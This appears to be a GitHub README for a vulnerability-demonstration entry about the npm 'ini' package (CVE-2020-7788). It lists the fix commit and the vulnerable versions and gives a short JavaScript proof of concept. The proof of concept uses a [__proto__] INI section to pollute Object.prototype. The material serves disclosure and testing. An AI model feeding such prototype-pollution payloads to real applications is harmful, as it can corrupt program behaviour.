Skip to content

Latest commit

 

History

History
23 lines (16 loc) · 477 Bytes

README.md

File metadata and controls

23 lines (16 loc) · 477 Bytes
Raw

ini

An ini encoder/decoder for node

Latest version: 2.0.0

CVE Fix
CVE-2020-7788 https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1

Exploits

const ini = require('ini');

ini.parse(`
[__proto__]
a = b
`);
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 1.0.0 1.0.1 1.0.2 1.0.3 1.0.4 1.0.5 1.1.0 1.2.0 1.2.1 1.3.0 1.3.1 1.3.2 1.3.3 1.3.4 1.3.5